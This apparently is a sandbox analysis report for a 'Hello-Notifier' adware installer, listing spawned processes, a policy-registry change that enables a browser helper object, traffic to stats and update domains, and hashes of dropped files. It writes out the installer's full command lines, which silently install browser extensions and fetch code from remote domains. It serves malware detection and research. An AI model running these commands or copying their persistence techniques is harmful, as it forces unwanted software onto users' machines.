PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe

"C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nso408.tmp\extensionData'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

C:\Windows\system32\taskeng.exe

taskeng.exe {7C836E48-4AFF-4099-9BC0-4F8A566DADB7} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'

Network

Country Destination Domain Proto
US 8.8.8.8:53 update.srvstatsdata.com udp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
US 8.8.8.8:53 errors.srvstatsdata.com udp
SG 13.251.16.150:80 errors.srvstatsdata.com tcp
US 8.8.8.8:53 stats.srvstatsdata.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 stats.mstatsserv.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 app-static.crossrider.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp

Files

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\System.dll

MD5 00a0194c20ee912257df53bfe258ee4a
SHA1 d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256 dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA512 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\WrapperUtils.dll

MD5 7a18f06f0935a9e98a14d47d77064573
SHA1 58b12858557fb39cf876b6e76e585cf581b53590
SHA256 422a61da2bedfdc8167cb022b4b5e0ff8588dc1e6bd40b3c4ba97588836f1b0f
SHA512 356fa81d066db57054d5477e96d12ca9a5e9639731c06d61dc320dc52bf6054f603523e2da3751a96a4608dc19c20868ed3573ccdf3d32bef025035770a434e6

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\StdUtils.dll

MD5 21010df9bc37daffcc0b5ae190381d85
SHA1 a8ba022aafc1233894db29e40e569dfc8b280eb9
SHA256 0ebd62de633fa108cf18139be6778fa560680f9f8a755e41c6ab544ab8db5c16
SHA512 95d3dbba6eac144260d5fcc7fcd5fb3afcb59ae62bd2eafc5a1d2190e9b44f8e125290d62fef82ad8799d0072997c57b2fa8a643aba554d0a82bbd3f8eb1403e

\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe

MD5 a4c3e2148c1e6f2298ca76e998d32efb
SHA1 309b580cf1386e24eba522c79c4d7ce2d1fd84a9
SHA256 7f0141ce147904a3c0debd19f46cb1111ce6315459b34b34b5039ed670862cd4
SHA512 234578790ff105eb7dde8ce6b785fbbd413a11aec85d6231bd4307ba229844eddb6060c7b5cc7ac545f901a8651966b02f350cb26fcc08c1dc7e0309455e5fc1

\Users\Admin\AppData\Local\Temp\nso408.tmp\nsislog.dll

MD5 e47100b70748fc790ffe6299cdf7ef2d
SHA1 ad2a9cd5f7c39121926b7c131816e7ba85aeead2
SHA256 271d539fe130276189e0a32b8a0bc9f08f2d92f7e17f85d88726735f14ea6144
SHA512 88452a9aeff453e7979df9240ab396cbc0c5d00efecda97df1e46f2ba1e9b5bfd990921e85d503beb4b35a1de7681390ba124eeeaf896f250717892ced133e93

memory/2116-37-0x0000000000700000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 64047dd1c5894f37adfa5ffade7e8ebd
SHA1 ce0f60a680e65944341c155d90156f0da98f7e6a
SHA256 463498413deb2a320122254c60d12f16a67ac3a3021c6ed2f3af1fcd743a8b7d
SHA512 96184d59ffb275ed2ec189baba9c12f32c093bcf6e0f80dd5931246face5e0db1660bf9669ff945b7e99b48964087b0c2d07d823abda393aa61e33e50e56a2f0

\Users\Admin\AppData\Local\Temp\nso408.tmp\InstallerUtils2.dll

MD5 8c17aa401cdc9bfe61b57f4d4bfec362
SHA1 8c580457b636bc30bedb476cebb9a50d9f02651d
SHA256 dfc863b01224a8d3bf35ef6064d6051aab295b9618db72647202f9ca97e45d19
SHA512 9fa29aab6cde651a0afb8cacf3dc2ee063b4351c7cf16c49668b2b59062914dbe53c93368e7b2a73a267c4d3eddd513fe7ac282422cf06397d2ad8839c3cd881

\Users\Admin\AppData\Local\Temp\nso408.tmp\nsisos.dll

MD5 69806691d649ef1c8703fd9e29231d44
SHA1 e2193fcf5b4863605eec2a5eb17bf84c7ac00166
SHA256 ba79ab7f63f02ed5d5d46b82b11d97dac5b7ef7e9b9a4df926b43ceac18483b6
SHA512 5e5e0319e701d15134a01cb6472c624e271e99891058aef4dfe779c29c73899771a5b6f8b1cd61b543a3b3defeaecaa080c9cc4e76e84038ca08e12084f128eb

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 457e3a88c808886ecc7ba8040b67a506
SHA1 b1be22c75ebdad25a7850ac75aad2501dfd6e451
SHA256 d1d7f7fa66b4c005fa95ae337e89fcd41e188ce6cbc3d28676ce9dd598709983
SHA512 b77c1c0932e4699075d4490ab01dbbdc61f359d2ef9953180b81f450d5575060e8df3ad2e6a2d834a11c8ef32e55cb77996edd8f58f42af46739ae39192c8222

memory/2116-265-0x0000000000700000-0x0000000000709000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 972f2f4d8fdb71a71afcade2f4e96220
SHA1 72d98eb2368e6e3f9f7ab2759d0337aa3e47f4c5
SHA256 e2ed3c0c5b039644f834a483da8febb51b4ef71f723a15ae7df50dd0b2fc5da5
SHA512 4d3a983f285239e95e42d45cb18c06071a45698fde224e8642df9ad2d267308fc843f9998f849bb1f4ea9599dc8d6026d36052eff7a08a5f798ff22d75fc1e66

\Users\Admin\AppData\Local\Temp\nso408.tmp\InstallerUtils.dll

MD5 895bc798fb0d31e5d3e584ae5701925b
SHA1 d5184d234c1768d3fe671be1512bb58688b37698
SHA256 050bcec7226cfe81328bd44de1091355d368f1e9183d232eef1f598ffbd3bc99
SHA512 b0b0a108f8c21e4f9420245646c546293ea1138580d47dae35b2e467bb2752d7c2cc9df490fdac9e2596acc258dfaa13df8bbf98d45c9f7d77418ac7fdf5cf7b

\Users\Admin\AppData\Local\Temp\nso408.tmp\UserInfo.dll

MD5 7579ade7ae1747a31960a228ce02e666
SHA1 8ec8571a296737e819dcf86353a43fcf8ec63351
SHA256 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
SHA512 a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

\Users\Admin\AppData\Local\Temp\nso408.tmp\inetc.dll

MD5 4c01fdfd2b57b32046b3b3635a4f4df8
SHA1 e0af8e418cbe2b2783b5de93279a3b5dcb73490e
SHA256 b98e21645910f82b328f30c644b86c112969b42697e797671647b09eb40ad014
SHA512 cbd354536e2a970d31ba69024208673b1dc56603ad604ff17c5840b4371958fc22bafd90040ae3fb19ae9c248b2cfce08d0bc73cc93481f02c73b86dbc0697b2

\Users\Admin\AppData\Local\Temp\nso408.tmp\md5dll.dll

MD5 0745ff646f5af1f1cdd784c06f40fce9
SHA1 bf7eba06020d7154ce4e35f696bec6e6c966287f
SHA256 fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70
SHA512 8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

memory/2904-349-0x0000000000400000-0x0000000000499000-memory.dmp

memory/2116-367-0x0000000000400000-0x00000000005B6000-memory.dmp

memory/2116-438-0x0000000000700000-0x0000000000709000-memory.dmp

memory/2116-446-0x00000000037D0000-0x00000000037E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 064d2a2851c44f039fa89e24672ec065
SHA1 2b6a7e3b294a73c63d8d013541bd70617dfb026a
SHA256 f2d61b9b2d422007fc273a93c6718a7d7264e5245fde3d2716d40a63340fdd07
SHA512 93dcfc3ee338b98508f784470347789d4cb6a49fb4c2d0d3c28fc924477c577ff506da787ca6b71f79e3eeac85d63bf3ddc3dc6805d95cb22fbde4aceea5d397

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log

MD5 995d53ca0536f2ee156c81f2614c9b2e
SHA1 c56f2b1696ec78c70ca0255a2741bd84795e2136
SHA256 d697ed3d474ab83263555f59d5401b3a8a81a9a433e7152b2644f6813e61bba8
SHA512 17df65e3eb2375d35d670576faa8dd360d8d4ce6f74f0dce1d8ae0c1b1f30fa7ad46dfa31ee195748d44c4b73317247abdbaa0975ea9586f5d4b68d98da76301

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 6d586d990046caa6363e0cfcf654f198
SHA1 b2bac57dfd1fca1fdfe8c233febcb6486c54fa16
SHA256 7dccabfab5396ca85ac6c45ba244d25c58279dbec948cda456355ef32e7ca0a1
SHA512 199ea6c9c050c1182736adc04aa6b021a7ebf9afe486fdc551f3bf2191e102fb8e61aefa4d850d6714e24cd3cd109b172bcbd857601513bdcfa1095eea252b68

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 4cf2227b60c543ab53e2e4bc710700f4
SHA1 c1811d55523373c6144f165f48fec686cd31e7d1
SHA256 fdd5b3df83a9e8a15114785a58e8c65cbf0c577d2ea124db12646c587daca1cf
SHA512 d862d1d373820d03e6da4b19a4cfaa08c4bf213eec1059c3c08606eea393e31b04b1a135b58ef0e41dd8ac5a1a40777902423e41cfe0a6f02220f72e574caeea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png

MD5 8b1eb9cb80417ec0022d278a44ab1dc7
SHA1 c49eb73f79e70b8ed96d91ef62f0bc344e41219a
SHA256 e358d97ba4c51b987fe73ea0ac0f14f9b2375e299f3e859fc37c21ab8b051ee6
SHA512 0324f2785d09f04c5be9ee77f1cb80a7afe06d66672baa862f63ec8ac59a2ae58199db91bb28e18409e918b222dcf09269013a270284213473ffa974d842c7d7

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 e6d0a9a8cb734bc1f13d57c730e129fa
SHA1 e5065caded5b9f4f7f38a6120d4b84b8aca33bfd
SHA256 f966a16b792a66563a303797075aa68ea471adbd7fcf0c9491604554c7224ee0
SHA512 802864ae5a1d50b0ad1e0acd5d922b116d68213c1792e7462fd0f1d314d2cfd1237d970e3e6577507180d6a2af947746a61798264602c19c292f89eaddf84485

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\ExecDos.dll

MD5 ebcf9f71d804abab3c2e5ce4c17dc22e
SHA1 17d13084e75cbfa5fbfdd0025e9a0ee5772ae765
SHA256 d387b725afbd2a6f9b44999278d21025fae55b391e45f7751b88dfb13511a993
SHA512 5576396c2d885c039668d7f401eeee583eb4de39e8497c3aaec32d47f4417a522fe6786c111d50a5fba7570f50e84144ef3a8aea42677d170e79114343c3a4a1

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 948956ea00a342ed2fbeb9b9d848cdb4
SHA1 3d4d189e3a86c349ebe8b9c18dde9763af31e8d2
SHA256 82176760af569cd0760edd89babe7daa0b6e66db583e70fe4783271e6da8f151
SHA512 05c5220da5c94e2a729ba70221519c26947a323df5a386261e87fcb1157e4e48e790789e6c75f66aa1847b4f044e90cb558da9eb46c678fc41704512d05603d8

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 f52e74224837f9291247a4024bed4c8c
SHA1 b6c916b2125f35b017c905814c18d1d65a8aba1f
SHA256 1db93820da20e9f0f0593b7f8673d1e4a8f8ef7b056e4f4b2e183411a3456863
SHA512 6c40cfe789be6702076090956ee567a2e3af2825dc728b026cb86b3b669c54d36af80cab6ed0e01e3cf6e97b28f8352e7aed45c8d76dedce832cdc384b3cf567

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 20936fe789ac5a514a121d89b2f12ee8
SHA1 3c870bcf7759eed6ff53035b536d3df06ec9b2a6
SHA256 bf3e287937ea58b4a02dfff54e42a51fb093b3d9ab676cec35e04c8bbf606cfd
SHA512 fb7970db528e36f600ba5dee318638e74378268642564df1fbfa7288fa67de205f6023f5c37904add46bb7065466439b377b48c8db03d479f33aca964737f6e3

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 c32aae898daaf1ce5c2c1245e1779e5e
SHA1 11ff845123b54eeb7d7dfbcae608103d98f93f25
SHA256 85e7571a25ad06b5bfdc6213dd353ebf317219cbf5e751af81c01b52ea631215
SHA512 93a531c2c58e9a64107f55f9047c7a7a1a4a1e69dfc4aef483b138af5bd7457d07167fa8476feea740b2d0b0bdb44de47b418998d5992d5c2c86f76b8cf41d68

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 b67172dc03787059255910a04e503c1f
SHA1 c5fa607ce7f49ea21be99e85c81e08b48ff6e6a6
SHA256 a5d9296206bb705d8ea2caa0296ea45b2534f7c0d306a7253f20e90a999f70e0
SHA512 835b1672a22466de661a78577f0234bc4ad941a2787acdf695589d1d68d7607328edf9f33f747f6d945b54b9a81fe0893d6af1671c8af054208450a17c61f7b3

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 e3e7b6547cbc72cd52dba5012113cbaf
SHA1 1c6f747cccd7034b81cf4907f236cbd098fd030b
SHA256 7333697624997e5b91986eed05d29c24e871c689ccf38aec78b1173936c628bd
SHA512 7fb9e707afc16da8e0d11dfd8244a345db58f59c6b8b9fc2eba3ba580432164805f715da797c93c7e1d4f9f3bc51cfb5afb3c740abc6901ecf56a6699d01e43f

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 1e1a99d240ed5b18da059b516f339f99
SHA1 48aa01a58ba7e98b3e080f7ada1c5697c198298b
SHA256 9a4fce8f4f6f6697f795220a9889a0063e4496ff568121ef98e2652eec323ad3
SHA512 8f1d26b539da067fa3f4cb616b8b165a0f0abd6e923ecf20a68039ab5c0ff139df236703f5b42ebc20b4c6c9d7e2385430ebef61a5c20e22311880b14c3f7634

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 24e88dfa25d52544039eed843dec878d
SHA1 a4a49a2ad1fca719e48ca91ec2690effe46c362f
SHA256 759ef12969121dbd07092c62b7d529584c4115e4690d736bdb5e82f7d41ee765
SHA512 7f3888685fd776f36941556c645aee0c692d447d75baad7600c2d36a47e0853f17c178f1e865b3ccde78634c2551eb0c08bb8db586afb42aedec9ccadd6b0822

C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp

MD5 9a294e54b99b6ce9d3903bfb7354f88e
SHA1 82a5811657bd9fe992269f140d0e64281500f098
SHA256 72c1270892564c368832db8c464c20b8982191a5f9f634cc6c5f4954c47126b7
SHA512 c0ac7cc9d90c35c980a533cef369d819da91eaeeae6569e04bf0c40fb9397aa263890a5a2570f3dca4e162d6e62afd56956dc3037e63909fc83e0c798a13d49e

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win10v2004-20241007-en

Max time kernel

114s

Max time network

116s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3008 wrote to memory of 4876 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3008 wrote to memory of 4876 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3008 wrote to memory of 4876 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4876 -ip 4876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win7-20240903-en

Max time kernel

15s

Max time network

17s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 224

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win10v2004-20241007-en

Max time kernel

115s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

Signatures

Checks for common network interception software

evasion

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
